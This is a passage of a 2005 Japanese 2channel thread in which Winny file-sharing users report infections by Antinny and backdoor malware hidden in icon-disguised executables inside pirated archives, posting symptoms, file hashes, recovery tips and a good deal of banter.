656:[名無し]さん(bin+cue).rar
05/02/17 09:11:49 PxvVObJn0
mpgファイルをダブルクリックしたら動画が再生されずHDDにアクセスしっぱなしになりました
これってウィルスでしょうか?
657:もうお腹いっぱいだよ
05/02/17 09:18:38 sJZetti/0
>>656
正解、ウィルスだ
さっさとOS再インスコしろよ。それ以外に方法無いから。
658:[名無し]さん(bin+cue).rar
05/02/17 09:22:59 PxvVObJn0
あうち(;´д⊂ヽ
659:[名無し]さん(bin+cue).rar
05/02/17 09:27:15 fvMPnGqW0
おいおい。いきなり再インスコかよw
660:[名無し]さん(bin+cue).rar
05/02/17 10:08:03 KsoiLSz40
>>498
を踏んだんだけどシステムの復元したら
タスクマネージャも普通に動くけど
これじゃ駄目なのかな?
661:[名無し]さん(bin+cue).rar
05/02/17 10:12:48 eJgHVsns0
>>660
お前がそれで良ければ問題ない
662:[名無し]さん(bin+cue).rar
05/02/17 11:44:43 +35bQR1u0
>>660
この板の住人はシステムの復元はみんなOFFにしてるんだよ。
663:[名無し]さん(bin+cue).rar
05/02/17 12:06:29 DVNyv/gu0
俺のデスクトップ、今月号が結構見つかるんですけど、
なんかまた亜種でも流行ってるんですか?
664:[名無し]さん(bin+cue).rar
05/02/17 13:25:11 gpvqTcyJ0
可能性がないとは胃炎
665:[名無し]さん(bin+cue).rar
05/02/17 14:34:32 v3FUi1sD0
>>409
昨日やられたorz
666:[名無し]さん(bin+cue).rar
05/02/17 14:42:13 yYKnnmV10
やられた。
アイコン偽装されてた。
クリックしたら「晒されたっていいじゃないか泥棒だもの ぬるぽ」
だと。
これってOS初期化するしか無い?
667:[名無し]さん(bin+cue).rar
05/02/17 14:43:58 gy9vfL2w0
【使用OS】 WinXP Home sp2
【WindowsUpdateしてるか】 している
【使用AntiVirusソフト】 ウィルスバスター2005
【AntiVirusをUpdateしてるか】 している
【ウイルススキャンの結果】 脅威なし
【オンラインスキャンしたなら結果】 脅威なし
【Winnyのバージョン】 b7.1
【Winny歴、総DL量】 200Gぐらい
【テンプレを読んだか】 読んだ
【テンプレにある対策を実行したか】しました
【症状、具体的に分かる限りすべて書く】
今まで一度も接続したことのないはずのBBSが勝手に作動
BbsNoderefを見てみるとなぜかノードがあり削除してももう一度起動させるとまた、ノード
が追加されています
【何をしたらそんなことになったのか】ウィルスチェックしてzipを開くとどう考えても怪しい
txtファイルがありとりあえずウィルスチェックするも反応なし・・・そのまま削除すればいいのだが
なぜかクリック→Antinny.Gに感染→orz
【これまでにとった措置】
→とりあえず削除、レジストリも多分問題なしAntinny.Gは解決
がBBSの症状はそのままこれってなんでしょうか?
668:[名無し]さん(bin+cue).rar
05/02/17 14:48:41 UDXE5NVR0
『まず、ここは初心者の質問・救済スレではありません。』
669:[名無し]さん(bin+cue).rar
05/02/17 14:53:33 rb1KH8Yz0
>>667
バスターが反応しないのに何故Antinny.Gって分かったの?
亜種じゃねーのか?
って言うか、何を踏んだのか、ファイル名・ハッシュ書けよ
そんなんじゃ答えようがない
>>666
お前は放置
670:[名無し]さん(bin+cue).rar
05/02/17 15:14:32 gy9vfL2w0
>>669
バスターはAntinny.Gには反応したんですが他にもなんか入ってたんじゃないかと
(Cレヴォ36) (同人誌) [D・N・A.Lab.] からだであそぼ (縦1500_14枚) (DEATH NOTE).zip
d3d9f3a1a9869f6dcaf93f197cf7654c
671:666
05/02/17 15:18:52 yYKnnmV10
いや、みんなが言うようにデスクトップ変更だけじゃなくて
例えば壁紙戻そうとしたら
C:\WINDOWS\system32\rundll32.exe
アプリケーションが見つかりません
って出てくるんだけど。
672:[名無し]さん(bin+cue).rar
05/02/17 15:30:30 4rsPj/GR0
このスレ推奨ニュイルス対応策
・クリーンインスコ
・PCを窓から投げ捨てる
・いっそペットとして飼ってみる
673:666
05/02/17 15:38:56 yYKnnmV10
いろいろ調べてみてるんだけどどうにも似たようなケースが無いみたい。
NYも起動できない。プログラムが開けない。
プログラムの追加と削除も開けないし。
ノートンがなにか削除したんだけどこうなっちゃった。
674:[名無し]さん(bin+cue).rar
05/02/17 15:51:13 seh6uXA60
皆に万能の解決策を教えてやる
ク リ ー ン イ ン ス ト 汁
675:666
05/02/17 16:25:34 yYKnnmV10
レジストリからなんか消せば直るのかな。
676:[名無し]さん(bin+cue).rar
05/02/17 16:28:55 GSORNqpl0
>>675
一つ上のレス
677:666
05/02/17 16:38:07 yYKnnmV10
訂正。アプリケーションを開こうとしたら
「ファイルを開くプログラムの選択」
ってゆうのが出てきて、
そこからそのアプリケーションと同じものを選ぶと開けた。
どうにかしたら直りそう。もう少し頑張ってみる。
678:[名無し]さん(bin+cue).rar
05/02/17 16:39:36 UDXE5NVR0
こんどは666の日記になるのかよorz
679:[名無し]さん(bin+cue).rar
05/02/17 16:48:08 rb1KH8Yz0
>>670
えーと、落として確認してみた。
BBSは俺も使ってなかったんだけど、BBS画面やBBSノードタブを開くと勝手に接続するね
BBSノードを削除してキャッシュクリアしてBBS切断してしばらくして接続解除されたけど多分大丈夫じゃないの?
詳しい人フォローよろしく
で、問題のファイル。俺の環境(XP_Pro)だと思いっきりexeに見えるんだけど
URLリンク(2ch-library.com) どうしてこれがテキストに見えたのかが疑問
左上の.folderファイルはよく分からん。AVGでウイルス反応無し。
203バイトなのでウイルスで無いだろうけど、もちろんダブルクリックする勇気は無しw
とりあえずantinnyGの対処だけで無問題だと思うけど心配ならクリーンインスコして頂戴
680:[名無し]さん(bin+cue).rar
05/02/17 16:50:02 NkY+ulh10
もっと親切にしてくれっていってんだろ?
うだうだ言ってないでさ
むずかしいことはできないかから
りかいできる言葉でしゃべってくれる?
ポワトリン好きだろう?お前ら?
681:[名無し]さん(bin+cue).rar
05/02/17 16:50:08 u/d5bGAc0
少し優しくなったね。ウイルス制作者さん
あんまりいじめないであげてね。
682:[名無し]さん(bin+cue).rar
05/02/17 16:52:11 FjJMWqwF0
>>669が偉そうだったからつい解析する気概のある人が来たかと思ったら、
ただのヘタレじゃんかよw
683:[名無し]さん(bin+cue).rar
05/02/17 16:53:59 wILsdj4o0
感染すると人のぬくもりが恋しくなる
684:[名無し]さん(bin+cue).rar
05/02/17 16:56:30 rb1KH8Yz0
>>682
今から上級者のID:FjJMWqwF0が解析してくれるそうです
皆さん生暖かく見守ってあげましょうw
685:[名無し]さん(bin+cue).rar
05/02/17 17:34:53 gy9vfL2w0
>>679
わざわざありがとうございます
パソコン買い換えてすぐなんで拡張子表示忘れてたんですが
↓拡張子表示してもこんな感じでtxtファイルにみえます
URLリンク(2ch-library.com)
とりあえずこののま監視してなんかやばそうだったらクリーンインスコしてみます
686:[名無し]さん(bin+cue).rar
05/02/17 17:42:21 JHbA3jZA0
>>685
どう見てもアイコン偽装のexeなわけだが
687:[名無し]さん(bin+cue).rar
05/02/17 17:47:57 GVmTBFyy0
↓次の方どうぞ
688:[名無し]さん(bin+cue).rar
05/02/17 17:57:42 rb1KH8Yz0
>>686
表示いろいろ変えてみたんだが、俺のXP_Pro SP2だと偽装表示されないんだよね
どうしてだ?
URLリンク(2ch-library.com)
689:[名無し]さん(bin+cue).rar
05/02/17 18:17:32 nN/IV6U/0
【使用OS】xp home sp2
【WindowsUpdateしてるか】してる
【使用AntiVirusソフト】ノートン2005
【AntiVirusをUpdateしてるか】してる
【ウイルススキャンの結果】脅威なし
【オンラインスキャンしたなら結果】していない
【Winnyのバージョン】7.1
【Winny歴、総DL量】80G程度
【テンプレを読んだか】読んだ
【テンプレにある対策を実行したか】一通り確認した
【症状、具体的に分かる限りすべて書く】
基本的には666と同じ
exeが.folderに偽装されている。
踏むと壁紙が「晒されたっていいじゃないか泥棒だもの ぬるぽ」 と書かれたbmpに
変更される。
どうやら、windowsフォルダにある模様。
【何をしたらそんなことになったのか】
(一般コミック・雑誌) [ジャンプ] [2005-12] DEATH NOTE page.58 「胸中」.zip,sIdxNm06Hv,0,0,1cafd7101e4dee38d4a613c95c78c887,1
を解凍、中にある偽装されたexeを踏んだ
【これまでにとった措置】
とりあえず、windowsフォルダに出来たbmpファイルを消した
690:[名無し]さん(bin+cue).rar
05/02/17 18:28:24 RjsamEOa0
>>685
めちゃワロタ
691:[名無し]さん(bin+cue).rar
05/02/17 18:30:21 NFXyShHz0
>>685
なんだ、フィッシングか・・・
>>680
面白い
692:666
05/02/17 18:36:26 yYKnnmV10
なんかもうしんどくなったんで再インストールした。
こうゆうの対処できる人間はいいねぇ。
693:[名無し]さん(bin+cue).rar
05/02/17 18:45:52 yOWVIG390
【使用OS】 winxp sp1
【WindowsUpdateしてるか】 してる
【使用AntiVirusソフト】 ノートン2004
【AntiVirusをUpdateしてるか】 してる
【ウイルススキャンの結果】 できない
【オンラインスキャンしたなら結果】
【Winnyのバージョン】 7.1
【Winny歴、総DL量】
【テンプレを読んだか】 読んだ
【テンプレにある対策を実行したか】 してるところ
【症状、具体的に分かる限りすべて書く】 「晒されたっていいじゃないか泥棒だもの ぬるぽ」
の壁紙になるのは同じだけど、その後全ての.exeファイル(ブラウザソフト、ノートン等)が起動できなくなった。
マイコンピューターのプロパティなんかもファイルが見つかりませんと言われる。
現在家にあるもう一台のPCで接続中なので、これに感染したら初期化する以外ネットに繋げないかも。
【何をしたらそんなことになったのか】 ウィニー起動してノードが繋がったらクリックしてないのに
勝手にハンターハンター12というファイルが落とされてきた。
削除と間違えて開くをクリックorz
【これまでにとった措置】 初期化中
694:[名無し]さん(bin+cue).rar
05/02/17 18:47:26 NFXyShHz0
>>692
>>693
>>409
>>507
695:666
05/02/17 18:47:41 yYKnnmV10
>>693
同じ。
696:[名無し]さん(bin+cue).rar
05/02/17 18:50:20 KlKJWDyu0
>>693
今度はどこを縦読みすればいいの?
697:[名無し]さん(bin+cue).rar
05/02/17 18:52:17 MSsg+T5P0
>>693
とりあえず変換タスクを起動しない
にチェックを入れときなされ
698:666
05/02/17 18:59:09 yYKnnmV10
タスク
マネージャ
起動したけど
特に問題
なかたよ
699:[名無し]さん(bin+cue).rar
05/02/17 18:59:37 fvMPnGqW0
新種ハセーイ? (((( ;゚Д゚)))ガクブル
700:666
05/02/17 19:03:20 yYKnnmV10
アンチニーKとあと一個なんかだった
701:[名無し]さん(bin+cue).rar
05/02/17 19:03:37 Jw7w2YFi0
すっとぼけた奴らばっかになったな
いつのまにか。
まぁ俺が縦読み書き込みした辺りからだから
せきにんは俺にあるのかもしれないけどな
ん?責任は取らないよ。ははは。
まぁこのスレも終わりだな
時間の問題だろ
で、次スレはどうすんの?分ける?質問と検証で。
702:[名無し]さん(bin+cue).rar
05/02/17 19:23:51 2VDfVodF0
>701
また、新手の釣りかよ。
じぶん頭どうかしてんじゃない?
からかってるつもりかもしれんが、
よゆう全然ないじゃん。
703:[名無し]さん(bin+cue).rar
05/02/17 19:27:46 seh6uXA60
おまいらうまいな
704:[名無し]さん(bin+cue).rar
05/02/17 19:32:54 Odm4Fsx50
>>639
winny ギシギシアンアンでぐぐってみ
前の時のスレがヒットするだろ
705:[名無し]さん(bin+cue).rar
05/02/17 19:41:21 Jw7w2YFi0
>>702
まあまあそう熱くなんなって
自分のことは自分がよく分かってるって
だからさぁ、なに?
余裕がない?
スルーできないお前の方が余裕ないじゃん
まあ厨はその程度ってことか
ん~?反論できないかな?ボクには。
706:[名無し]さん(bin+cue).rar
05/02/17 19:47:28 NFXyShHz0
もう、わかったから、な?
707:[名無し]さん(bin+cue).rar
05/02/17 19:48:30 GRY7MTJF0
Antinny.Qってのに感染したようなんだが
スキャンして感染ファイルのある場所を見ても
問題のファイルが見つからない(;´Д`)
不可視ではないようなんがどういうことよ?
708:[名無し]さん(bin+cue).rar
05/02/17 20:02:58 dkmsZnFd0
>>707
隔離or検疫済みじゃないの?
709:[名無し]さん(bin+cue).rar
05/02/17 20:07:17 iDdrbJpV0
>>1-708 >>710-1000
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――‐┬┘
____.____ | .__ パソコンを
| | | | |\_\ 窓から
| | ∧_∧ | | | |.◎.| 投げ捨てろ
| |( ´∀`)つ ミ | | |.: |
| |/ ⊃ ノ | | .\|.≡.|
 ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄ |  ̄ ̄
710:[名無し]さん(bin+cue).rar
05/02/17 20:12:54 HA9pcjHk0
AntiWinny.A
というものが援交のファイルについてきました
発見したら、フォルダごとなくなっていました
ウィルスバスターは削除できないといってました
これは感染したのですか?
もしくはウィルスバスターが消し去ってくれたのですか?
711:[名無し]さん(bin+cue).rar
05/02/17 20:17:44 BNnXFtNS0
[シングルCD][アニメ] 魔法先生ネギま EDテーマ 輝く君へ (192kbps)+ジャケ.zip
e5db8c6d5c878e0fbf908a20c38db063
これのなっか身はなんだろな~
712:[名無し]さん(bin+cue).rar
05/02/17 21:09:11 1QO+tic70
>>710
AntiWinny.Aなんてウィルスはない
713:[名無し]さん(bin+cue).rar
05/02/17 21:14:12 yz5pAxe20
【社会】「"君は2ちゃんねらー?"と聞くと、むっとした様子に」
Winny裁判、京都府警刑事が証言
スレリンク(newsplus板)
714:[名無し]さん(bin+cue).rar
05/02/17 21:21:29 2sC+bt6o0
拡張子を表示してない奴が、拡張子有り(偽装)を踏むんじゃねーよ
715:[名無し]さん(bin+cue).rar
05/02/17 23:34:15 dRajaj0Y0
ファイルの表示形式は「詳細」にしておく
フォルダのアイコンを変更しておく
基本だろ?
716:[名無し]さん(bin+cue).rar
05/02/18 01:45:03 G6L/iQxyO
>>693と同じ状況になった
ノートンもつかえないようだ
これ新種ですか?
717:[名無し]さん(bin+cue).rar
05/02/18 01:49:55 t6g6077x0
報告者がダメポンタンばかりだとベンダーも対処できない…
という流れですかああそうですか
718:529
05/02/18 01:54:07 6otvt+2o0
悪さされますた・・・_| ̄|○
719:[名無し]さん(bin+cue).rar
05/02/18 02:11:17 t07fiTHu0
>勝手にハンターハンター12というファイルが落とされてきた。
嘘つくなよ
720:[名無し]さん(bin+cue).rar
05/02/18 02:33:29 35iJ7qd90
>498
642さんの
URLリンク(www.symantec.com)
の UnHookExec.inf をインストール後、
URLリンク(support.microsoft.com)
を参考にして、グループ ポリシー エディタから [シャットダウン]ボタンを
復帰することができました。
当方は、Win2000です。
721:[名無し]さん(bin+cue).rar
05/02/18 02:36:59 kGTsQo+H0
あれ、なんか画面に血がみえたような・・・・。
722:[名無し]さん(bin+cue).rar
05/02/18 03:07:14 4ZIBztLL0
画面に精液ついてるような・・・。
723:[名無し]さん(bin+cue).rar
05/02/18 03:29:54 6lGk8PIF0
モウダメポ
724:[名無し]さん(bin+cue).rar
05/02/18 03:38:27 wHcKfQJk0
>>718
何があったんだYO
725:[名無し]さん(bin+cue).rar
05/02/18 05:26:28 vjq+qjRn0
ウイルス日記
726:[名無し]さん(bin+cue).rar
05/02/18 06:18:15 jVEAnrhU0
おまいら、新種ウイルス感染されても文句言わないよな?
727:[名無し]さん(bin+cue).rar
05/02/18 06:54:30 I2udsk/q0
そんなワガママは言わねーよ!
728:[名無し]さん(bin+cue).rar
05/02/18 07:19:00 xDppL8DW0
ウィルスにかかったら素直にOS入れ直せや
動作軽くなるぞ
729:[名無し]さん(bin+cue).rar
05/02/18 09:23:02 3ZPqoLzC0
>>728
それを言ったらこのスレの意味がなくなるわけだが。
730:[名無し]さん(bin+cue).rar
05/02/18 09:35:52 S3OPnHhz0
>>729
別にここはOSを再インストールせずにウィルス駆除する
方法を調査するだけのスレじゃないぞ
731:[名無し]さん(bin+cue).rar
05/02/18 09:58:26 uchbrsGF0
症状や行った対策とその効果について報告してくれれば後はどうでもいい。
732:666
05/02/18 10:50:19 Mdk8GraB0
対処法がわかった。
スタート→アクセサリ→システムの復元を選択して
どのプログラムで開くか選択するところで
CドライブのWINDOWSの中にあるSYSTEM32のRestoreのrstruiを選ぶと復元出来る。
おまいらイケズだな。これぐらいのこと教えてくれよ。
733:[名無し]さん(bin+cue).rar
05/02/18 11:23:35 XLaMbCUE0
>>666
そんな事も知らなかったのかYO
つか、そんな事はWindows初心者質問板で聞け
『まず、ここは初心者の質問・救済スレではありません。』って>>1にあるだろヴォケ
734:666
05/02/18 12:05:23 Mdk8GraB0
>>733
ペッ
735:[名無し]さん(bin+cue).rar
05/02/18 12:20:02 0yoxqpa70
>>734
さっさと(・∀・)カエレ!
736:666
05/02/18 12:40:42 qvqNd4nK0
/ ̄ ̄ ̄\
i'___{_ノl|_|i_トil_|i
|,彡 -‐ ‐-{.i| マターリ、マターリ・・・
》|il(_, ''' - ''丿|
ノリ i `フ i´il l|
/ノ l| ハーハ ll
737:666
05/02/18 12:57:33 /VQjOlJd0
お前らパソコンヲタクは黙って初心者様に教えていれば良いんだよ(プ
738:[名無し]さん(bin+cue).rar
05/02/18 12:58:00 mGdpjtA60
>>716
他に報告がないし、新種じゃない?
739:[名無し]さん(bin+cue).rar
05/02/18 13:08:08 SvcSppf90
ここ数日は初心者様を罵倒してた香具師が
ウィルスに感染して大騒ぎしてるようだが。
740:[名無し]さん(bin+cue).rar
05/02/18 14:04:43 w0HjbxWL0
winnyしていなくてもantinnyはネット接続しているだけ発症するものなのでしょうか?
あと、感染していたら、winny入れてなくても、画像のスクリーンショットとか取られて
勝手に送られてしまうのでしょうか?
741:[名無し]さん(bin+cue).rar
05/02/18 14:24:30 XLaMbCUE0
>>740
>>1
742:[名無し]さん(bin+cue).rar
05/02/18 14:34:45 4bGtzHC/0
どこかの初心者スレに誘導でも貼られたのかな?
743:[名無し]さん(bin+cue).rar
05/02/18 15:23:49 QTJE1W190
さて、そろそろ次スレについて語ろうか。
方向性としては3つ。
1. 現状維持、これからもなし崩し的に初心者の面倒を見る
2. 思い切って初心者の質問・救済スレッドに変更してしまう
3. 初心者の面倒は質問スレに任せ、うちでは鑑定・調査のみにする
744:[名無し]さん(bin+cue).rar
05/02/18 15:36:17 V1P/AEmW0
いまでも面倒見てないから、初志貫徹の3でいいんじゃね?
745:[名無し]さん(bin+cue).rar
05/02/18 15:43:26 mGdpjtA60
そうだね。禁止事項は「初心者の質問」であって質問じゃない訳だし。
テンプレ読んでググれば簡単に分かる事まで、聞くべきでも答えるべきでもなかろう。
746:[名無し]さん(bin+cue).rar
05/02/18 15:58:45 S3OPnHhz0
感染する人がまず殆ど初心者で、その初心者な患者の相談に乗って救済を助けるスレが無いから、
結局ここに溜まって、互いに情報交換してるのが現状なんでないの?
747:[名無し]さん(bin+cue).rar
05/02/18 16:05:15 GFVM/S+U0
まあ、新種を発見してくれるのは初心者だ罠
748:[名無し]さん(bin+cue).rar
05/02/18 16:06:31 Mrr0Tu1m0
>>732のやり方で復元するとウイルスも消えるのか?
749:[名無し]さん(bin+cue).rar
05/02/18 16:07:54 vsKEOEfU0
【初心者は】Winnyを狙ったワーム・ウイルス情報 Part34【(・∀・)カエレ!】
750:[名無し]さん(bin+cue).rar
05/02/18 16:12:17 a/lGkP4r0
>>749
ソレダ(・∀・)
751:[名無し]さん(bin+cue).rar
05/02/18 16:12:37 7FaAZiKj0
それぞれ自己中でいいんじゃない?
質問に答えたい気分のときはこたえて、
面白いウイルス発見したら調査、晒す
質問したいなら、スルー覚悟で質問
すべて気の赴くまま
752:[名無し]さん(bin+cue).rar
05/02/18 16:14:56 4F6+8LYU0
>>749
ニュイルス(・∀・)イレロ!!
753:[名無し]さん(bin+cue).rar
05/02/18 16:16:22 SVVLnR6C0
>>743
俺も3に賛成
アンチウィルスソフトが対応あるいは認知していない新種のウィルス(含亜種)が発生した場合に
それをnyユーザに警告して被害を最小限に食い止めることに意味があると思う。
既知のウィルスに関する質問は別のところでお願いできないかな。
754:[名無し]さん(bin+cue).rar
05/02/18 16:21:47 S3OPnHhz0
>743
3は何気によさそうに見えるけど、鑑定ってのはどうかと思う
どんどんハッシュ貼られてこれ安全?とかやられたら、
いやそういうスレもあっていいとは思うが、ここでそれやりだしたら収集つかなくなるだろ
755:[名無し]さん(bin+cue).rar
05/02/18 16:22:49 Us56cQkY0
鑑定お願いします
(成年コミック) [香月りお] ぷにっと .zip 6a6aa9079f34d7a36eff3aa27f6e3bc3
756:[名無し]さん(bin+cue).rar
05/02/18 16:33:17 01DetdK/0
>>755
自分でやれ
URLリンク(housecall.antivirus.com)
757:[名無し]さん(bin+cue).rar
05/02/18 16:35:53 a/lGkP4r0
最新の先生バスターやオンラインスキャンで検出されないもの限定で
どんなファイルをどうしたらどんな症状が出たかまで書いてくれないとな
758:[名無し]さん(bin+cue).rar
05/02/18 16:46:25 bjIJO9ni0
>最新の先生バスターやオンラインスキャンで検出されないもの限定で
これ>>1の一行目に追加してもいいと思う
759:[名無し]さん(bin+cue).rar
05/02/18 16:56:48 QTJE1W190
どれを選んでも結局は1になりそうだな。
そんなに頻繁に新種や新手法が発生するわけでもないし。
760:[名無し]さん(bin+cue).rar
05/02/18 17:53:04 Z7YWnIe00
新種かと思えば新種でもないただテンプレも見てないってパターン
がありそうだな。
761:[名無し]さん(bin+cue).rar
05/02/18 18:22:31 GImwOfdb0
いいじゃん、今のままで
新種でも既出でも、どんなファイルにウイルスを仕込んであるのか、報告くれる訳だし
マターリマターリ
762:[名無し]さん(bin+cue).rar
05/02/18 20:20:01 Z7YWnIe00
(成年コミック) [尾山泰永] 爆乳学園・zip
を解凍しフォルダの中にJPEG以外に、txtファイルやrpoファイルとか
入ってたから、まあ削除してたけど、そのあとCドライブウイルスス
キャンし、風呂から帰ってきたとき
downに残ってるzipに反応が、Antinnyだった、それもtxtが擬装だった。
あぶねえ~もしクリックしてたらどうなってたろう?爆乳どころか
爆殺されるところだったよ。
763:[名無し]さん(bin+cue).rar
05/02/18 20:30:43 wGPgPYMv0
ここは武勇伝を披露するスレになりました・・・
チラシの(ry
764:[名無し]さん(bin+cue).rar
05/02/18 21:02:54 RG8kF6xw0
>を解凍しフォルダの中にJPEG以外に、txtファイルやrpoファイルとか
ヤバイじゃん。
解凍した時点でお前はもうすでに感染している。
765:[名無し]さん(bin+cue).rar
05/02/18 21:16:50 vfByW1qV0
>>762
おーのーだズラ。おまいもうだめだズラ。
766:[名無し]さん(bin+cue).rar
05/02/18 22:10:28 CloFqOYH0
>762
逆にお仕置きされちまったズラ。
767:[名無し]さん(bin+cue).rar
05/02/18 22:32:42 FG1F85Qc0
やられました。
Hunter Hunter のファイルで、中身のexeファイルがフォルダアイコンに
偽装されていたのに、思わずクリックしてしまいました。
5秒経って、とりあえずネットワークケーブルは抜いたけど。
まあ、いざとなったら入れなおすけど。
ウインドウズアップデートは必ずやってる。ノートンAV,IS2005
も入っている。いつもは勝手に削除してくれるのに。
症状
exe ファイルが立ち上がらない。explor.exe 等は立ち上がるけど、
ほとんどのものは駄目。コントロールパネルは全て実行不可。
レジストリもいじれない。
windows フォルダに nwiz.exe というファイルが出来ていたので、
とりあえず隔離。Program files には変なファイルは無いと思うのだが。
とりあえず、explor で更新時間が新しいものは無い。
768:[名無し]さん(bin+cue).rar
05/02/18 22:37:52 QG0h7pzV0
>>767
ノートン先生に報告しとけよ。
769:[名無し]さん(bin+cue).rar
05/02/18 23:02:29 8founHDNO
nwiz.exeってnVIDIAのドライバの南下じゃないの?
俺スタートアップに入ってるけど
770:[名無し]さん(bin+cue).rar
05/02/18 23:11:34 cflIBEYpO
nVIDIAの脆弱性をついたワームがいたからそれの変種かもしれないね。
771:[名無し]さん(bin+cue).rar
05/02/18 23:32:38 Mrr0Tu1m0
>>666よ
復元したあとはどうしたか教えてくれ
772:666
05/02/18 23:37:01 Mdk8GraB0
>>771
別に。異常無いよ。一応前の日にまで戻したけど。
>>767も>>732でオケ
773:[名無し]さん(bin+cue).rar
05/02/18 23:37:49 Mrr0Tu1m0
>>772
>>732やるだけでウイルスはなくなったのか?
774:666
05/02/18 23:38:53 Mdk8GraB0
それとハンタの今週の分がかなり出回ってた。
バックドアなんとかってのとアンチニーKの二つだった。
775:666
05/02/18 23:40:21 Mdk8GraB0
>>773
完全スキャンしたが何も検出されんかったよ。
ハンタ12が読みたくて先走ってしまった人間が多いね。
776:[名無し]さん(bin+cue).rar
05/02/18 23:41:38 Mrr0Tu1m0
>>775
定義ファイルがまだ対応してないだけじゃないの?
777:[名無し]さん(bin+cue).rar
05/02/18 23:43:24 Mdk8GraB0
>>776
それもあるかもね。
でも今のところ異常は無いよ。クリックするだけでexeが開けるって素晴らしい。
778:[名無し]さん(bin+cue).rar
05/02/18 23:44:32 Mrr0Tu1m0
>>777
でもあれデスクトップの画像が晒されるやつじゃないか?
779:[名無し]さん(bin+cue).rar
05/02/18 23:44:38 gszx93QG0
そりゃ対応してないだろ
780:666
05/02/18 23:49:18 Mdk8GraB0
別に晒されて恥ずかしいデスクトップじゃないしさ。
なに?人柱になってんの?
781:[名無し]さん(bin+cue).rar
05/02/18 23:50:25 Mrr0Tu1m0
>>780
いや。
ウィニーに晒されるんだよな?
782:666
05/02/18 23:52:24 Mdk8GraB0
>>781
そこまで重要なことだろうか。
783:[名無し]さん(bin+cue).rar
05/02/18 23:53:13 Agg3eCRg0
>>666
システム復元すらできない・・・。
784:[名無し]さん(bin+cue).rar
05/02/18 23:53:44 Mrr0Tu1m0
>>782
そうか。
その後経過をまた教えてくれ
785:666
05/02/18 23:55:16 Mdk8GraB0
>>783
>>732で出来たよ。
786:666
05/02/18 23:56:48 Mdk8GraB0
>>784
とりあえずノートンの定義更新を待つ。
787:[名無し]さん(bin+cue).rar
05/02/18 23:57:46 elyWvkZi0
いまHunter Hunterにやられた香具師五万といるわけか・・・
788:666
05/02/18 23:58:57 Mdk8GraB0
デスノもあるんじゃなかったっけか。
でもLが生きるか死ぬかだから無理もないのかな。
ハンタはたいした内容じゃなかったし・・・
789:[名無し]さん(bin+cue).rar
05/02/19 00:05:57 lCdsbZxh0
そうか、アンチウイルスソフト入れてる安心感から踏む奴いるんだな。
新種には無効力…。
790:[名無し]さん(bin+cue).rar
05/02/19 00:11:08 JvzjmHBo0
>>666
732のやりかたでやったんだけどexeファイルすべてが開けないのでその方法が通用しなかった。
ノートンの定義更新待ってもそのノートンが開けないからなぁ。
再インストか。ちなにみhunterhunter。
791:666
05/02/19 00:16:14 qc7tlQDQ0
>>790
いやだから、プログラムを開くファイルを選択してくださいって出るでしょ?
そこから参照ボタンでCドライブ、WINDOWS、SYSTEM32、Restore、rstruiって選んだ?
792:666
05/02/19 00:17:28 qc7tlQDQ0
>>790
それとハンタハンタ乙
793:[名無し]さん(bin+cue).rar
05/02/19 00:26:50 NQJ3OT1n0
ドキュ~~~~~~ン
794:[名無し]さん(bin+cue).rar
05/02/19 01:15:54 Pyw1Jz2Q0
>>666
>いやだから、プログラムを開くファイルを選択してくださいって出るでしょ?
出てくれると思ったけど、それが出てくれないのさ。
なのであきらめます。
とりあえずいろいろレスサンクスでした666
795:[名無し]さん(bin+cue).rar
05/02/19 01:26:34 uOd5mG8+0
>>794
>>642でどおさ
796:[名無し]さん(bin+cue).rar
05/02/19 01:35:33 Pyw1Jz2Q0
>>795
一通りここのスレッド全部読んだつもりだったがそれは最後の手段として試そうとスルーしてたんだった!
ありがとう。試してみる!
797:796
05/02/19 01:43:41 Pyw1Jz2Q0
>>795 サンクス!
とりあえずexeファイルは実行できるようになりました!
後はネットに繋げる環境に戻せるようまた一からこのスレ読みなおします。
感謝!
798:[名無し]さん(bin+cue).rar
05/02/19 01:51:42 uOd5mG8+0
おめでと
改めて>>732もやってみたら?
799:[名無し]さん(bin+cue).rar
05/02/19 02:15:36 lmnHDWRK0
796のとまったく同じ症状になっってたよ
ありがとう、このスレの住人
796のお陰ですぐ直せたし
800:796
05/02/19 02:50:24 Pyw1Jz2Q0
ちなみにノートン起動してウイルス名が判明したので晒しておく。
「Backdoor.OptixPro.12.b 」
同じような人いたらググってみ。
>>798
そうします。今全体をスキャン中。
801:[名無し]さん(bin+cue).rar
05/02/19 03:03:30 am5lwhAp0
普通にやってても特に問題なしだけど
実は潜伏してるってタイプのキンタマウイルスってある?